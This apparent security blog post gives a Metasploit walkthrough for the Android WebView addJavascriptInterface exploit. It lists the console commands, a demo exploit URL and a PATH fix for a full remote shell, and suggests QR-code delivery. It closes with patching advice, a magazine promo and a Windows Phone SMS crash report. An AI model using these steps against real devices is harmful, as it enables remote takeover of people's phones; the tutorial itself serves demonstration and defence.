Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:

Exploit

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

Free Issue of Exploit Magazine Released!

Check out the new Exploit Magazine! The first issue of the Exploit Magazine has just been published. It is totally devoted to Metasploit Framework.

  • Metasploit Framework – Demystified: Introduction to Metasploit Framework
  • Metasploit Exploitation Samples

You can download the magazine for free after registering as a free user. I hope that you will enjoy the content. Register now and enjoy future free issues of the Exploit Magazine:

http://theexploitmag.com/category/magazine

Exploit Magazine is looking for authors!

Are you a computer security expert or researcher that knows a thing or two about exploits and exploit defense? Share you knowledge with the community!

Contact me at cyberarms(at)live.com for more information.

Windows Phone Denial-of-Service Attack Disables Messaging

A specially crafted SMS text or Facebook chat message can disable the Windows Phone Messaging Hub according to Winrumors.com:

“The flaw works simply by sending an SMS to a Windows Phone user. Windows Phone 7.5 devices will reboot and the messaging hub will not open despite repeat attempts. We have tested the attack on a range of Windows Phone devices, including HTC’s TITAN and Samsung’s Focus Flash. Some devices were running the 7740 version of Windows Phone 7.5, others were on Mango RTM build 7720.

The attack is not device specific and appears to be an issue with the way the Windows Phone messaging hub handles messages. The bug is also triggered if a user sends a Facebook chat message or Windows Live Messenger message to a recipient.”

The malicious text message causes the Windows Phone to reboot, and then when it is back up, the Messaging Hub is no longer accessible. The vulnerability has been reported to Microsoft, but as of now there is no fix for the problem other than hard resetting and wiping the phone.

Fun, fun – Who’s idea was it to make our cell phones into computers? Didn’t they realize that with the benefits of computers also come the pitfalls?